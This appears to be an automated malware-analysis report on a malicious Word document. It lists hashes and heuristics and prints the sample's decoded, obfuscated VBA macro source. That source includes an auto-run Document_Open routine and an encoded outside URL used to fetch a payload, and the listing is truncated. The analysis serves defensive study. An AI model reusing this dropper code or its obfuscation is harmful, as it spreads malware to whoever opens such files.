Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b3802551732d5a57…

MALICIOUS

Office (OLE)

91.5 KB Created: 2016-05-29 23:55:00 Authoring application: Microsoft Office Word First seen: 2017-12-09
MD5: 396dbaa4ffcea21bf1705baff4b7a1af SHA-1: 7ea85b7704b4636b398189fe5a3a5832c3442c83 SHA-256: b3802551732d5a57ae441e996ce1a886324d64a9fef8831bac4128fa72a3d540
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The presence of a Document_Open macro and high-severity heuristics for CreateObject and CallByName indicate that the VBA code is designed to execute automatically upon opening the document. The obfuscated nature of the VBA script prevents a detailed analysis of its exact function, but it is highly probable that it attempts to download and execute a secondary payload. The benign URLs extracted do not provide further clues.

Heuristics 6

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14718 bytes
SHA-256: 6c4846d8598ef1f82849473010bc29d96a31053ca81d94dd39b7770633e27071
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function fvKAaq(ByVal RjHAYZ As String, ByVal plZMuVXW As String) As Integer
CIkPvETJFUk
JWAJBH = 6891
JFWxcIjPC 4165
jqPQzD 7578, "ytiGjsd6ekKE"
If GDiCp Then
TGmhFfRyvckn "KPKE2HeClOLt", True, "HRt68o9ZNQ"
JhNaBG "AMfRcApjwJrG0bt", True
NQRybJUhZKprF
Else
lFuWfXpMg 1146
End If
fvKAaq = 5291
End Function
Private Sub OicfHgZKVWVjfS(ByVal ROjtSfe As String, ByVal zojJPqZNmTLS As Integer)
wjOhKnl "iBqpXyVXVHZaR7y", 5222, True
sQZNJVCfHZN
naHcc 7063
End Sub
Private Function RaRKlSjcuok() As String
If VlDpzxjXRiD Then
ZIyxebwODKgm
Else
aeDGRAWOKLFzkM 2523
End If
RaRKlSjcuok = "TTwrJXZ1Y4"
End Function
Private Sub Document_Open()
Dim aOwVHlBlpxax As String
AtovKyQBvllrVa = 5132
iurSDPGCtkdXP.ONzArApHFkICm
End Sub
Private Function LhplDdFLj(ByVal SqtOT As Integer, ByVal BSRdtj As String) As Boolean
AOYJU 564, 1218, "SlRtSQMod8yKy"
JnHbvIhGtMNp = 5855
CRTrffoKEvF 1901, "CrLjGfjfnt"
roQQLb 7473
AHDmJRufY 238, "ewqCg0U9eI46", "uVr1BazvfhaP"
LhplDdFLj = False
End Function

Attribute VB_Name = "iurSDPGCtkdXP"
Private Sub enIVozeeGiem()
Dim jKPQSEuutha As Integer
IsQDtkacJsON = 7110
iJueTzjdd ejtrxReBIBUyR.ZtFAYECi, 1503, tMMYmHU
ejtrxReBIBUyR.MnHBqswijt ejtrxReBIBUyR.ZtFAYECi
End Sub
Public Sub ONzArApHFkICm()
oucjzcinmWTVGi = 4891
On Error GoTo GIEifT
IpEfKV.sgRKorfj
IpEfKV.NwXpZWHfDnf
enIVozeeGiem
Exit Sub
GIEifT:
End Sub
Private Sub iJueTzjdd(ByVal dbhXZ As String, ByVal CaDod As Integer, ByVal GPbwXSXU As String)
Dim qCKszCQwGnH As Integer
Set uSunG = pGwrUXKyr.IKIuG("2g9c1xwaIKK", GPbwXSXU, "fS4dLFhwjQc3")
pGwrUXKyr.zFeXXjpDotNa uSunG, qPKtf.LjgMgzvQpOMhN("CSajSn'UUtU dJpo9w5nlSo5UadS gjbiSn.5a9ry5J f.i9lJpe", "gp.9SJ5Uj")
ejtrxReBIBUyR.unvIXAYLSYMLu dbhXZ, uQHXwgmR.PiVneV(uSunG, qPKtf.LjgMgzvQpOMhN("R7 emsp oQ3nsmemB5mod y ", "5 7Dm3.Q"))
End Sub
Public Function YKvUmnO(ByVal kOehqnhaZspbkF As String, ByVal GxFzAhlNIxn As String) As Object
Dim IniMFqJthap As String
Dim qYToCbBHhTlJs As String
Set YKvUmnO = tgaCE(CreateObject(GxFzAhlNIxn), False, False)
End Function
Private Function tgaCE(ByVal JHplXpXB As Object, ByVal gvzTxyb As Boolean, ByVal lcwvfCmNuqeIxb As Boolean) As Object
Set tgaCE = JHplXpXB
End Function
Private Function tMMYmHU() As String
tMMYmHU = qPKtf.LjgMgzvQpOMhN("Yh9tWtpWb:/M/9Yra9vLYirYa9jLbibt.YMcoYmW/Mc9aWLta9lLo9Lg/bbobffM9i9ceb19W1M.WdYatY", "bY9WML")
End Function

Attribute VB_Name = "qPKtf"
Public Function LjgMgzvQpOMhN(ByVal fqtdUgRdJ As String, ByVal rAVKHfdcXpQ As String) As String
Dim YFCNPGqz As Boolean
For TgYIwO = HcjLBkiEARGkcz To etdjJMlUgCJJp.ypTiE("JiZetYgNzqIM", fqtdUgRdJ)
LjgMgzvQpOMhN = etdjJMlUgCJJp.juNGoc("MT7mNDYhCPs9", LjgMgzvQpOMhN, 8054, ERNBjA(rAVKHfdcXpQ, etdjJMlUgCJJp.LpaKnDK(TgYIwO, "jQRmVT0yjlnJ5vB", fqtdUgRdJ)))
Next
End Function
Private Sub tKyFLY(ByVal tgAspzOCCPRc As Boolean)
YeOUSKbjsQSeHv = "LmzuBVC6d"
uMlYtSUHd 4633, "qRTudaFcn"
cdMOlSvIwbZ "jelylouIu", "SqZR0uDkvu9k0As", "7PbaXEF5x"
rFqbKCDfWQTRCa = False
CryJBQjzIjjAL "E8gfTrZgIm1un7"
gfBXxUaJWrIf 7882
cGOKdTFyCZjE = 779
NscRhRyJBDv
End Sub
Private Sub biLps()
If xjhEYtWTu Then
ByxHwGYit
MoFuIxgPJ = "2Xr8Zmcrck6L"
End If
End Sub
Private Function ERNBjA(ByVal JqwChEMzvTVegT As String, ByVal HXsgjVgtmR As String) As String
Dim ioylxn As Integer
Dim fiPHulhgAVDg As String
If Not etdjJMlUgCJJp.yqhjXuyPzPe(HXsgjVgtmR, "eGPQegGkvXuCkf", JqwChEMzvTVegT, 4638) Then
ERNBjA = HXsgjVgtmR
End If
End Function
Private Function HcjLBkiEARGkcz() As Integer
LTleDTcEW = "YRiN3zRorJJqyMb"
HcjLBkiEARGkcz = 1
End Function

Attribute VB_Name = "pGwrUXKyr"
Private Function VJwqlnCkCZsZ() As String
FaVDWvMiFb
uCKxyjpW "HsmZfMX2tfHRJ", "Toaxo3tHExKrkJ", 1389
LCjkyELUitfwTn
qWyHYZHtbegHJD 2198, 3506, 5073
JYBeU
VJwqlnCkCZsZ = "ay2916dWNOdif52"
... (truncated)